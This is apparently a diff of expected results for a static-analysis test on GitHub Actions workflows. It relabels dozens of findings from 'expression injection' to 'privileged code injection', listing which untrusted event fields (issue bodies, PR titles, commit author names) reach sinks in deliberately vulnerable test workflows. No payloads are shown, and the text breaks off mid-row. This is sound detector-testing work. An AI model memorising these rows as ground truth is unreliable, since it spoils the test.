| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | github.event.head_commit.author.email | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | github.event.head_commit.author.name | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | github.event.head_commit.committer.email | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | github.event.head_commit.committer.name | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | github.event.commits[11].committer.email | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | needs.job1.outputs['job_output'] | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | github.event.workflow_run.head_commit.author.name | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | github.event.workflow_run.head_commit.committer.email | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | github.event.workflow_run.head_commit.committer.name | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | github.event.workflow_run.head_branch | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | github.event.workflow_run.head_repository.description | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | 